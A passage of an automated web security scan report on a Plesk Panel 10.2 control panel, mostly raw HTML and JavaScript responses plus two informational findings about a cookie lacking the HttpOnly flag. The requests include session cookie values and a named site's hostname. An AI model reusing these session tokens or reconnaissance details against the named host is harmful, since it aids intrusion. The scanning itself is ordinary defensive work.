           <DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find services.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DomainTrafficListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);DomainTrafficListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all services.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DomainTrafficListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);DomainTrafficListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV>
       </td>
   </tr>
</table></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>4 Services total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><tr class="oddrowbg"><td><strong>Total amount for the subscription</strong></td><td><div class="number"><strong>Used</strong></div></td><td><div class="number"><strong>Limit</strong></div></td><td><div class="number"><strong>Available</strong></div></td><td colspan="2"><div class="number"><strong>Used</strong> (in %)</div></td></tr><tr class="oddrowbg"><td>vulnerable.host.fqdn</td><td><div class="number">0.00 MB</div></td><td><div class="number">100 GB/month</div></td><td><div class="number">100 GB/month</div></td><td width="5%"><div class="number">0%</div></td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr><TR><th width="50%" class="sort"><A href="#" onClick="DomainTrafficListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Service</a><img 
src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="10%" class="number"><A href="#" onClick="DomainTrafficListSort(&#039;used_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by total amount of traffic.&quot;&#125;]);" onMouseOut="tooltip.hide();">Used</a></th><th width="10%" class="number"><A href="#" onClick="DomainTrafficListSort(&#039;in_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by incoming traffic.&quot;&#125;]);" onMouseOut="tooltip.hide();">In</a></th><th width="10%" class="number"><A href="#" onClick="DomainTrafficListSort(&#039;out_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by outgoing traffic.&quot;&#125;]);" onMouseOut="tooltip.hide();">Out</a></th><th width="20%" colspan="2" class="number"><A href="#" onClick="DomainTrafficListSort(&#039;ubar_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by service traffic share in the total traffic at the domain.&quot;&#125;]);" onMouseOut="tooltip.hide();">% of All</a></th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>FTP</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number" width="5%">0%</td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I 
class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td>HTTP</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number" width="5%">0%</td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>POP3/IMAP</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number" width="5%">0%</td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if 
(&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td>SMTP</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number" width="5%">0%</td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>4 Services total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("domaintrafficlist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30=");
           function DomainTrafficListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function DomainTrafficListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function DomainTrafficListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function DomainTrafficListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.DomainTrafficListSelectAll.checked;
                           DomainTrafficListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function DomainTrafficListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function DomainTrafficListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function DomainTrafficListFilter(f)
           {
               
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function DomainTrafficListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function DomainTrafficListSearchShow()
           {
               var sc = document.getElementById("DomainTrafficListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("DomainTrafficListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function DomainTrafficListSearchHide()
           {
               var sc = document.getElementById("DomainTrafficListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("DomainTrafficListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function DomainTrafficListRemove(f)
           {
               if (0 == DomainTrafficListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/traffic-hosting";
               lsubmit(f);
               return false;
           }
       </script>
       </td></tr></table>
   </fieldset>
</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.35. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/shared-ssl/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/shared-ssl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/shared-ssl/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:26 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:26 GMT
Connection: close
Content-Length: 11772


5.36. http://vulnerable.plesk.control.panel.20110407.20:8880/spaw/spaw.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /spaw/spaw.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spaw/spaw.php HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:09:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:09:20 GMT
Connection: close
Content-Length: 70449

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="bdaafe67daaa200e2f077bd9577b09f4" id="forgery_protection_token" name="forgery_protection_token">
       <link rel="shortcut icon" href="/favicon.ico">
       <title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"></script>
<script language="javascript" type="text/javascript" src="/javascript/main.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script language="javascript" type="text/javascript" src="/javascript/chk.js.php?plesk_version=psa-10.2.0-20110407.20"></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script language="javascript" type="text/javascript" src="/javascript/widget.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script language="javascript" type="text/javascript" src="/javascript/tooltip.js?plesk_version=psa-10.2.0-20110407.20"></script>
<script language="javascript" type="text/javascript" src="/javascript/jsw.js?plesk_version=psa-10.2.0-20110407.20"></script>
       
       
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->


       <script type="text/javascript">
<!--
function _body_onload()
{
   turnAutocompleteOff();
   loff();
   var std_context = 'spaw';
   SetHelpPrefix('cl/'); SetContext(std_context, '');
   
   save_as_oC(document.forms[0]);
   try {
       if (top && top.leftFrame) {
           SetExpandLeftFrame();
       }
   } catch (e) { }
}

function _body_resize()
{
}

function _body_onunload()
{
   lon();
   
}


var opt_no_frames = false;
var opt_integrated_mode = false;
               function _key_hadler_onkeypress(e)
               {
                   var event = e ? e : window.event;
                   var target = e ? event.target : event.srcElement;
                   var key = event.keyCode;

                   if (navigator.appName == "Netscape" &&
                       (navigator.platform.indexOf("Mac") == -1 && key == 112 && navigator.userAgent.indexOf("Safari") == -1 ||
                       navigator.platform.indexOf("Mac") > -1 && key == 63236)
                   ) { OpenHelpWindow(); return false; };

                   try {
           if (key == "13") {
               if (target && (target.type == "button" || target.type == "textarea"))
                   return true;
               bt = document.getElementById("bid-ok");
               if (navigator.appName == "Netscape")
               {
                   if (bt) bt.onclick();
               }
               else
               {
                   if (bt)    bt.click();
               }
               return false;}if (key == "27") {
               bt = document.getElementById("bid-cancel");
               if (navigator.appName == "Netscape")
               {
                   if (bt) bt.onclick();
               }
               else
               {
                   if (bt)    bt.click();
               }
               return false;}
                   } catch (e) {
                   }
                   return true;
               }
               if (document.layers) document.captureEvents(Event.KEYPRESS);
               document.onkeypress = _key_hadler_onkeypress;
           

           function save_as_oC(f)
           {
               f.save_as_file.disabled = !f.save_as.checked;
           }

           function reload_oC(f)
           {
               f.cmd.value = "reload";
               lsubmit(f);
               return false;
           }

           function update_oC(f)
           {
               try {
                   SPAW_UpdateFields();
               } catch (e) {
               }
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

       
//-->
       </script>


   </head>
   <body onLoad="_body_onload();" onUnload="_body_onunload();" onResize="_body_resize();" onHelp="OpenHelpWindow(); return false;" id="mainCP" class=" ">
   <a href="#" name="top" id="top"></a>
   <table width="100%" cellspacing="0" cellpadding="0" border="0" id="pageLayout"><tr><td id="screenWH">
   <div class='titleWrapper'>
       <div class="pathbar clear"><span class="pathbarItem"><a href="/plesk/client@/dashboard/">Home</a></span><SPAN class="pathbarItem separator">&gt;</SPAN><span class="pathbarItem"><a href="/plesk/hosting-panel=web.view/">Websites &amp; Domains</a></span><SPAN class="pathbarItem separator">&gt;</SPAN><span class="pathbarItem"><a href="/plesk/client@/domain@1/hosting/file-manager/">File manager</a></span><SPAN class="pathbarItem separator">&gt;</SPAN></div>
       
       <div class="screenTitle">
           <table width="100%" cellspacing="0">
           <tr>
               <td class="title">
                   <div class='titleContainer clear'><h1>WYSIWYG editor: <span class="name">/httpdocs/index.html</span></h1></div>
                   
                   
               </td>

               <td class="toolbar">
                   <div class="toolbarWrapper">
                       <div class="toolbarItems">
                           <table cellspacing="0">
                               <tr>
                               <td><div class="toolbarBtn" id="bid-up-level"><A name="up_level" id="up_level" href="/plesk/client@/domain@1/hosting/file-manager/" onClick=";lon();"><span>Up Level</span></a></div></td>
                               </tr>
                           </table>
                       </div>
                   </div>
               </td>

           </tr>
           </table>
       </div>
   </div>
   <div class="screenBody" id="">
       <div id="warnings"></div>
       
       <form action="/spaw/spaw.php" method="POST" onSubmit="this.submit();">
<div class="formArea">
   <fieldset>
       <legend>Edit file <span class="name">/httpdocs/index.html</span></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
       
       <table class="formFields" cellspacing="0">
           <tr>
               <td class="name">View the original file in the following encoding: </td>
               <td><select name="load_codepage" id="fid-load_codepage" >    <option value='437'>437</option>
   <option value='850'>850</option>
   <option value='852'>852</option>
   <option value='855'>855</option>
   <option value='857'>857</option>
   <option value='860'>860</option>
   <option value='861'>861</option>
   <option value='862'>862</option>
   <option value='863'>863</option>
   <option value='865'>865</option>
   <option value='866'>866</option>
   <option value='869'>869</option>
   <option value='ANSI_X3.4-1968'>ANSI_X3.4-1968</option>
   <option value='ANSI_X3.4-1986'>ANSI_X3.4-1986</option>
   <option value='ARABIC'>ARABIC</option>
   <option value='ARMSCII-8'>ARMSCII-8</option>
   <option value='ASCII'>ASCII</option>
   <option value='ASMO-708'>ASMO-708</option>
   <option value='BIG-5'>BIG-5</option>
   <option value='BIG-FIVE'>BIG-FIVE</option>
   <option value='BIG5'>BIG5</option>
   <option value='BIG5-HKSCS'>BIG5-HKSCS</option>
   <option value='BIG5HKSCS'>BIG5HKSCS</option>
   <option value='BIGFIVE'>BIGFIVE</option>
   <option value='C99'>C99</option>
   <option value='CN'>CN</option>
   <option value='CN-BIG5'>CN-BIG5</option>
   <option value='CN-GB'>CN-GB</option>
   <option value='CP-GR'>CP-GR</option>
   <option value='CP1125'>CP1125</option>
   <option value='CP1133'>CP1133</option>
   <option value='CP1250'>CP1250</option>
   <option value='CP1251'>CP1251</option>
   <option value='CP1252'>CP1252</option>
   <option value='CP1253'>CP1253</option>
   <option value='CP1254'>CP1254</option>
   <option value='CP1255'>CP1255</option>
   <option value='CP1256'>CP1256</option>
   <option value='CP1257'>CP1257</option>
   <option value='CP1258'>CP1258</option>
   <option value='CP1361'>CP1361</option>
   <option value='CP367'>CP367</option>
   <option value='CP437'>CP437</option>
   <option value='CP737'>CP737</option>
   <option value='CP775'>CP775</option>
   <option value='CP819'>CP819</option>
   <option value='CP850'>CP850</option>
   <option value='CP852'>CP852</option>
   <option value='CP853'>CP853</option>
   <option value='CP855'>CP855</option>
   <option value='CP857'>CP857</option>
   <option value='CP858'>CP858</option>
   <option value='CP860'>CP860</option>
   <option value='CP861'>CP861</option>
   <option value='CP862'>CP862</option>
   <option value='CP863'>CP863</option>
   <option value='CP864'>CP864</option>
   <option value='CP865'>CP865</option>
   <option value='CP866'>CP866</option>
   <option value='CP869'>CP869</option>
   <option value='CP874'>CP874</option>
   <option value='CP932'>CP932</option>
   <option value='CP936'>CP936</option>
   <option value='CP949'>CP949</option>
   <option value='CP950'>CP950</option>
   <option value='CSASCII'>CSASCII</option>
   <option value='CSEUCKR'>CSEUCKR</option>
   <option value='CSEUCPKDFMTJAPANESE'>CSEUCPKDFMTJAPANESE</option>
   <option value='CSGB2312'>CSGB2312</option>
   <option value='CSHPROMAN8'>CSHPROMAN8</option>
   <option value='CSIBM855'>CSIBM855</option>
   <option value='CSIBM857'>CSIBM857</option>
   <option value='CSIBM860'>CSIBM860</option>
   <option value='CSIBM863'>CSIBM863</option>
   <option value='CSIBM864'>CSIBM864</option>
   <option value='CSIBM865'>CSIBM865</option>
   <option value='CSIBM866'>CSIBM866</option>
   <option value='CSIBM869'>CSIBM869</option>
   <option value='CSISO14JISC6220RO'>CSISO14JISC6220RO</option>
   <option value='CSISO2022CN'>CSISO2022CN</option>
   <option value='CSISO2022JP'>CSISO2022JP</option>
   <option value='CSISO2022JP2'>CSISO2022JP2</option>
   <option value='CSISO2022KR'>CSISO2022KR</option>
   <option value='CSISOLATIN1'>CSISOLATIN1</option>
   <option value='CSISOLATIN2'>CSISOLATIN2</option>
   <option value='CSISOLATIN3'>CSISOLATIN3</option>
   <option value='CSISOLATIN4'>CSISOLATIN4</option>
   <option value='CSISOLATIN5'>CSISOLATIN5</option>
   <option value='CSISOLATIN6'>CSISOLATIN6</option>
   <option value='CSISOLATINARABIC'>CSISOLATINARABIC</option>
   <option value='CSISOLATINCYRILLIC'>CSISOLATINCYRILLIC</option>
   <option value='CSISOLATINGREEK'>CSISOLATINGREEK</option>
   <option value='CSISOLATINHEBREW'>CSISOLATINHEBREW</option>
   <option value='CSKOI8R'>CSKOI8R</option>
   <option value='CSMACINTOSH'>CSMACINTOSH</option>
   <option value='CSPC775BALTIC'>CSPC775BALTIC</option>
   <option value='CSPC850MULTILINGUAL'>CSPC850MULTILINGUAL</option>
   <option value='CSPC862LATINHEBREW'>CSPC862LATINHEBREW</option>
   <option value='CSPC8CODEPAGE437'>CSPC8CODEPAGE437</option>
   <option value='CSPCP852'>CSPCP852</option>
   <option value='CSSHIFTJIS'>CSSHIFTJIS</option>
   <option value='CSUCS4'>CSUCS4</option>
   <option value='CSUNICODE'>CSUNICODE</option>
   <option value='CYRILLIC'>CYRILLIC</option>
   <option value='ECMA-114'>ECMA-114</option>
   <option value='ECMA-118'>ECMA-118</option>
   <option value='ELOT_928'>ELOT_928</option>
   <option value='EUC-CN'>EUC-CN</option>
   <option value='EUC-JP'>EUC-JP</option>
   <option value='EUC-KR'>EUC-KR</option>
   <option value='EUC-TW'>EUC-TW</option>
   <option value='EUCCN'>EUCCN</option>
   <option value='EUCJP'>EUCJP</option>
   <option value='EUCKR'>EUCKR</option>
   <option value='EUCTW'>EUCTW</option>
   <option value='GB18030'>GB18030</option>
   <option value='GB2312'>GB2312</option>
   <option value='GBK'>GBK</option>
   <option value='GB_1988-80'>GB_1988-80</option>
   <option value='GEORGIAN-ACADEMY'>GEORGIAN-ACADEMY</option>
   <option value='GEORGIAN-PS'>GEORGIAN-PS</option>
   <option value='GREEK'>GREEK</option>
   <option value='GREEK8'>GREEK8</option>
   <option value='Georgian-Academy'>Georgian-Academy</option>
   <option value='Georgian-PS'>Georgian-PS</option>
   <option value='HEBREW'>HEBREW</option>
   <option value='HP-ROMAN8'>HP-ROMAN8</option>
   <option value='HZ'>HZ</option>
   <option value='IBM367'>IBM367</option>
   <option value='IBM437'>IBM437</option>
   <option value='IBM775'>IBM775</option>
   <option value='IBM819'>IBM819</option>
   <option value='IBM850'>IBM850</option>
   <option value='IBM852'>IBM852</option>
   <option value='IBM855'>IBM855</option>
   <option value='IBM857'>IBM857</option>
   <option value='IBM860'>IBM860</option>
   <option value='IBM861'>IBM861</option>
   <option value='IBM862'>IBM862</option>
   <option value='IBM863'>IBM863</option>
   <option value='IBM864'>IBM864</option>
   <option value='IBM865'>IBM865</option>
   <option value='IBM866'>IBM866</option>
   <option value='IBM869'>IBM869</option>
   <option value='ISO-2022-CN'>ISO-2022-CN</option>
   <option value='ISO-2022-CN-EXT'>ISO-2022-CN-EXT</option>
   <option value='ISO-2022-JP'>ISO-2022-JP</option>
   <option value='ISO-2022-JP-1'>ISO-2022-JP-1</option>
   <option value='ISO-2022-JP-2'>ISO-2022-JP-2</option>
   <option value='ISO-2022-KR'>ISO-2022-KR</option>
   <option value='ISO-8859-1'>ISO-8859-1</option>
   <option value='ISO-8859-10'>ISO-8859-10</option>
   <option value='ISO-8859-13'>ISO-8859-13</option>
   <option value='ISO-8859-14'>ISO-8859-14</option>
   <option value='ISO-8859-15'>ISO-8859-15</option>
   <option value='ISO-8859-16'>ISO-8859-16</option>
   <option value='ISO-8859-2'>ISO-8859-2</option>
   <option value='ISO-8859-3'>ISO-8859-3</option>
   <option value='ISO-8859-4'>ISO-8859-4</option>
   <option value='ISO-8859-5'>ISO-8859-5</option>
   <option value='ISO-8859-6'>ISO-8859-6</option>
   <option value='ISO-8859-7'>ISO-8859-7</option>
   <option value='ISO-8859-8'>ISO-8859-8</option>
   <option value='ISO-8859-9'>ISO-8859-9</option>
   <option value='ISO-CELTIC'>ISO-CELTIC</option>
   <option value='ISO-IR-100'>ISO-IR-100</option>
   <option value='ISO-IR-101'>ISO-IR-101</option>
   <option value='ISO-IR-109'>ISO-IR-109</option>
   <option value='ISO-IR-110'>ISO-IR-110</option>
   <option value='ISO-IR-126'>ISO-IR-126</option>
   <option value='ISO-IR-127'>ISO-IR-127</option>
   <option value='ISO-IR-138'>ISO-IR-138</option>
   <option value='ISO-IR-14'>ISO-IR-14</option>
   <option value='ISO-IR-144'>ISO-IR-144</option>
   <option value='ISO-IR-148'>ISO-IR-148</option>
   <option value='ISO-IR-157'>ISO-IR-157</option>
   <option value='ISO-IR-166'>ISO-IR-166</option>
   <option value='ISO-IR-179'>ISO-IR-179</option>
   <option value='ISO-IR-199'>ISO-IR-199</option>
   <option value='ISO-IR-203'>ISO-IR-203</option>
   <option value='ISO-IR-226'>ISO-IR-226</option>
   <option value='ISO-IR-57'>ISO-IR-57</option>
   <option value='ISO-IR-6'>ISO-IR-6</option>
   <option value='ISO646-CN'>ISO646-CN</option>
   <option value='ISO646-JP'>ISO646-JP</option>
   <option value='ISO646-US'>ISO646-US</option>
   <option value='ISO_646.IRV:1991'>ISO_646.IRV:1991</option>
   <option value='ISO_8859-1'>ISO_8859-1</option>
   <option value='ISO_8859-10'>ISO_8859-10</option>
   <option value='ISO_8859-10:1992'>ISO_8859-10:1992</option>
   <option value='ISO_8859-14'>ISO_8859-14</option>
   <option value='ISO_8859-14:1998'>ISO_8859-14:1998</option>
   <option value='ISO_8859-15'>ISO_8859-15</option>
   <option value='ISO_8859-15:1998'>ISO_8859-15:1998</option>
   <option value='ISO_8859-16'>ISO_8859-16</option>
   <option value='ISO_8859-1:1987'>ISO_8859-1:1987</option>
   <option value='ISO_8859-2'>ISO_8859-2</option>
   <option value='ISO_8859-2:1987'>ISO_8859-2:1987</option>
   <option value='ISO_8859-3'>ISO_8859-3</option>
   <option value='ISO_8859-3:1988'>ISO_8859-3:1988</option>
